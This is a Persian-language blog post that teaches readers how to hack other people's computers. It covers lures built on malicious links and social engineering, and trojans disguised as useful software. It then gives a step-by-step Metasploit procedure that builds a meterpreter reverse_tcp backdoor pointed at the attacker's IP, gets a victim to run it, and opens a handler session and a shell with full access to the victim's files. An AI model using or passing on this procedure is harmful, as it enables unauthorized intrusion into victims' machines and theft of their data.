نظارت بر سیستم کامپیوتری از راه دور

جایگزین اینستاگرام
جایگزین اینستاگرام بعد از فیلتر کردن آن چه اپلیکیشن هایی هستند ؟
ژانویه 8, 2019
دانلود پینترست
دانلود پینترست به همراه آموزش نصب
ژانویه 12, 2019

نظارت بر سیستم کامپیوتری از راه دور

هک سیستم

بازدید: 196

یکی از واژه هایی که این روزها به وفور می شنویم، واژه هک و جاسوسی است. این واژه ها به پرکاربردترین واژه ها در دنیای تکنولوژی امروز تبدیل شده است. این روزها افراد زیادی را می بینیم که به دنبال روش هایی برای هک سیستم های کامپیوتری و یا گوشی ها هستند. حال برخی از این افراد موفق به دستیابی روش های مطمئن و کارآمد می شوند و برخی همچنان در پی روشی مطمئن برای هک سیستم های کامپیوتری هستند. اما سوالی که پیش می آید این است که بهترین و مطمئن ترین روش برای هک و نفوذ به سیستم های کامپیوتری چه روشی است ؟ در ادامه این مطلب به این سوال پاسخ خواهیم داد و آموزش هایی را درباره نحوه استفاده از روش های هک سیستم کامپیوتر در اختیار علاقه مندان به این مبحث قرار می دهیم.

هک سیستم کامپیوتر چگونه انجام می شود؟

برای هک و مانیتورینگ کامپیوتر و به طور کلی سیستم های کامپیوتری روش های زیادی وجود دارد، اما مطمئن ترین و پرکاربردترین روش آن ها دسترسی به کامپیوتر و اطلاعات شخص قربانی می باشد. در این روش هکر با نصب یک نرم افزار یا لینک آلوده، عملیات هک را آغاز کرده و به تمام اطلاعات موجود در کامپیوتر شخص مورد نظر خود دسترسی پیدا می کند. اما همانطور که گفتیم علاوه بر این روش، روش های بسیار دیگری وجود دارند که در ادامه به آموزش آن ها می پردازیم.

هک با استفاده از لینک های آلوده

یکی از روش های پرکاربرد که تاکنون قربانیان زیادی هم داشته است، ترغیب فرد قربانی به باز کردن لینک های آلوده می باشد. در این شیوه، هکر با استفاده از مهندسی اجتماعی، کاربر را ترغیب و یا حتی مجبور به کلیک بر روی لینک آلوده ای که برای وی ارسال کرده می کند. به طور مثال هکر لینک را با متنی جذاب مثلا فیلمی مخفی از یک فرد مشهور و یا وعده شرکت در قرعه کشی، برای قربانی ارسال می کند و به این ترتیب قربانی مشتاق به کلیک بر روی لینک می شود و پس از کلیک و باز کردن لینک کار تمام است، چرا که برنامه ای در پشت پرده قرار دارد که بدون متوجه شدن کاربر تمام اطلاعات وی را برای هکر ارسال می کند.

هک با استفاده از تروجان ها

یکی دیگر از روش های هک سیستم های کامپیوتری که در بین هکرها هم بسیار محبوب است، استفاده از تروجان ها می باشد. تروجان ها برنامه هایی هستند که در قالب یک نرم افزار مفید و یا یک بازی سرگرم کننده ساخته می شوند و در اختیار شخص قربانی قرار می گیرند تا بر روی سیستم خود نصب کند، اما پس از نصب و استفاده از آن برنامه، کامپیوتر وی هک شده و تمام اطلاعات موجود در سیستم برای هکر ارسال می شود. تروجان ها معمولا برنامه های به ظاهر ساده و معمولی هستند و هیچ نشانه ای از این که یک برنامه هک می باشند ندارند، به همین دلیل هم شناسایی آن ها بسیار سخت است.

هک سیستم کامپیوتری با استفاده از IP و بطور مستقیم

این روش یعنی روشی که به طور مستقیم و بدون استفاده از برنامه بتوان یک کامپیوتر را هک کرد، سخت ترین روش هک سیستم های کامپیوتری می باشد. برای هک کامپیوتر به این شیوه، هکر می بایست به زبان های برنامه نویسی و علوم کامپیوتر مسلط باشد. سپس با استفاده از سیستم عامل کالی لینوکس یا بکترک لینوکس، به سیستم کاربر قربانی در شبکه متصل می شود و با دانشی که دارد نواحی آسیب پذیر سیستم قربانی را تشخصی می دهد و از طریق این نواحی به کامپیوتر او نفوذ کرده و به تمام اطلاعات موجود در سیستم دسترسی پیدا می کند.

آموزش هک سیستم کامپیوتر از طریق کالی لینوکس

هک و نفوذ به کامپیوتر با استفاده از سیستم عامل کالی لینوکس بسیار ساده است و یک روش دارد که در این قسمت به شما نشان خواهیم داد تا بدانید که هکرها چگونه و چه ساده می توانند کامپیوترهای شما را هک کنند.

هک سیستم

در ابتدا هکر کالی لینوکس را در سیستم خود باز می کند و به محیط ترمینال لینوکس وارد می شود. سپس برای رفتن به محیط متااسپلوییت دستور msfconsole را وارد می کند. سپس در دستور msfpayload windows/meterpreter/reverse_tcp LHOST=SourceIPAdress X > Desktop/Backdoor.exe به جای آدرس آی پی LHOST آدرس آی پی سیستم خود را وارد می کند. با استفاده از این دستور در واقع یک در پشتی در کالی لینوکس ساخته است.

پس از انجام مراحل بالا، هکر باید فایلی که ساخته است  را برای قربانی ارسال کرده و او را تشویق به کلیک بر روی فایل نماید.

حال در همان خط فرمانی که هکر قرار داشت دستور use exploit/multi/handler را وارد می کند. پس از آن در خط جدید دستور set payload windows/meterpreter/reverse_tcp را وارد و همان آدرس آی پی خود را با دستور set lhost IPAdress در قسمت IPAdress قرار می دهد. در آخر و بعد از پایان این مراحل عبارت exploit -j –z را وارد می کند تا ماژول handler کار خود را شروع نماید.

اکنون وقتی که کاربر قربانی فایلی که هکر ارسال کرده است را اجرا کند در محیط متاسپلوییت یک هشدار با موضوع این که یک نشست تازه در فایل ایجاد شده است نمایش داده می شود. سپس هکر برای ایجاد ارتباط با این نشست، دستور sessions -i 1 را وارد می کند.

اولین نشست هکر با سیستم کاربر قربانی که برقرار شود، کار تمام است و هک سیستم کامپیوتری با موفقیت به پایان می رسد. و هکر برای دسترسی به کلیه مسیر ها و پوشه های کامپیوتر قربانی، کافیست دستور Shell را در خط فرمان تایپ کند. از این پس هکر به تمام اطلاعات موجود در کامپیوتر قربانی دسترسی دارد.

همچنین می توانید درباره هک دوربین مداربسته نیز مطالعه کنید.

دیدگاهتان را بنویسید